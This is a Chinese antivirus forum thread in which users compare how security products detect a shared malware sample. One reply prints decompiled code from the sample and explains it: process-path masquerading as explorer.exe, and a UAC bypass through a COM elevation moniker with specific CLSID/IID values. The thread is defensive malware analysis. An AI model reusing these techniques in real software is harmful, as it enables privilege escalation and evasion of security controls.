楼主: wwwab
收起左侧

[病毒样本] 样本

  [复制链接]
wwwab
 楼主| 发表于 2024-9-22 13:09:01 | 显示全部楼层
Loyisa 发表于 2024-9-22 12:38
Comodo 扫描miss 同没跑出恶意行为

楼上测卡巴的几位好像跑出来了?
Loyisa
发表于 2024-9-22 13:19:11 | 显示全部楼层
wwwab 发表于 2024-9-22 13:09
楼上测卡巴的几位好像跑出来了?

对,但是我这里没跑出来外联啥的
莒县小哥
发表于 2024-9-22 13:33:02 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-9-22 13:33:37 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-9-22 14:57 编辑
  1. int sub_10001210()
  2. {
  3.   {
  4.     lpBaseAddress = 0;
  5.     memset(v28, 0, 0x38u);
  6.     v20 = 0;
  7.     v21 = 0;
  8.     LibraryA = LoadLibraryA("ntdll.dll");
  9.     NtQueryInformationProcess = (NTSTATUS (__stdcall *)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))GetProcAddress(LibraryA, "NtQueryInformationProcess");
  10.     if ( NtQueryInformationProcess && NtQueryInformationProcess(v1, ProcessBasicInformation, &v5, 24, 0) >= 0 )
  11.     {
  12.       ReadProcessMemory(v1, lpBaseAddress, &Buffer, 0x20u, 0);
  13.       ReadProcessMemory(v1, *(LPCVOID *)((char *)&v15 + 3), &v22, 0x48u, 0);
  14.       v20 = 48;
  15.       WriteProcessMemory(v1, v28[13], L"C:\\windows\\explorer.exe", 0x30u, 0);
  16.       WriteProcessMemory(v1, &v28[12], &v20, 2u, 0);
  17.       v21 = 48;
  18.       WriteProcessMemory(v1, v28[11], L"C:\\windows\\explorer.exe", 0x30u, 0);
  19.       WriteProcessMemory(v1, &v28[10], &v21, 2u, 0);
  20.       CloseHandle(v1);
  21.       return 1;
  22.     }
  23.     else
  24.     {
  25.       return 0;
  26.     }
  27.   }
  28.   return result;
  29. }
复制代码
从ntdll中取出NtQueryInformationProcess并调用,向explorer.exe写入内存
  1. int __thiscall sub_10001060(void *this)
  2. {

  3.   memset(&pclsid, 0, sizeof(pclsid));
  4.   memset(&iid, 0, sizeof(iid));
  5.   ppv = 0;
  6.   CLSIDFromString(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", &pclsid);
  7.   IIDFromString(L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}", &iid);
  8.   memset(sz, 0, sizeof(sz));
  9.   memset(pszName, 0, 520);
  10.   CoInitialize(0);
  11.   StringFromGUID2(&pclsid, sz, 260);
  12.   if ( sub_10001000(L"Elevation:Administrator!new:%s", sz) < 0 )
  13.     goto LABEL_4;
  14.   memset(&pBindOptions.grfFlags, 0, 12);
  15.   v7 = 0;
  16.   v9 = 0;
  17.   v10 = 0;
  18.   pBindOptions.cbStruct = 36;
  19.   v11 = 0;
  20.   v8 = 4;
  21.   if ( CoGetObject(pszName, &pBindOptions, &iid, &ppv) < 0
  22.     || (v2 = (*(int (__stdcall **)(void *, void *, const wchar_t *, _DWORD, _DWORD, _DWORD))(*(_DWORD *)ppv + 36))(
  23.                ppv,
  24.                this,
  25.                L"-register abc",
  26.                0,
  27.                0,
  28.                0),
  29.         v3 = 1,
  30.         v2 < 0) )
  31.   {
  32. LABEL_4:
  33.     v3 = 0;
  34.   }
  35.   if ( ppv )
  36.     (*(void (__stdcall **)(void *))(*(_DWORD *)ppv + 8))(ppv);
  37.   return v3;
  38. }
复制代码
白利用RuntimeSvc.exe ,这个COM接口估计就是瑞星报UACBypass的原因

评分

参与人数 1人气 +3 收起 理由
隔山打空气 + 3

查看全部评分

玛姆库特
发表于 2024-9-22 14:21:36 | 显示全部楼层
(EIS+智量)实机双击svcghost.exe,miss,进程没退等了几分钟手动关闭,是在检测什么呢
星神不灭
头像被屏蔽
发表于 2024-9-22 19:19:41 | 显示全部楼层
ELGD报安全,好像只要ELGD报安全之后eset就完全不管了。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aikafans
发表于 2024-9-22 19:45:08 | 显示全部楼层
火绒
QQUpdateMgr\FLVLib.dll, 病毒名:Trojan/Generic!B8E9CE5760F44D56, 病毒ID:b8e9ce5760f44d56, 处理结果:已处理,删除文件
biue
发表于 2024-9-22 22:27:51 | 显示全部楼层
腾讯电脑管家 1X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
btbtg
发表于 2024-9-22 23:33:52 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
gove
发表于 2024-9-23 08:09:36 | 显示全部楼层
kaba666 发表于 2024-9-22 10:56
整个过程在不停的调用Consoie Windows Host, 貌似在检测电脑是否安装有QQ等或其它,再次测,这玩意还有点顽 ...

你测试比较认真哈,让我认识到真实的卡巴,卡巴就是这样强大是很强大,但总不那么尽如人意
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-30 20:47 , Processed in 0.105658 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表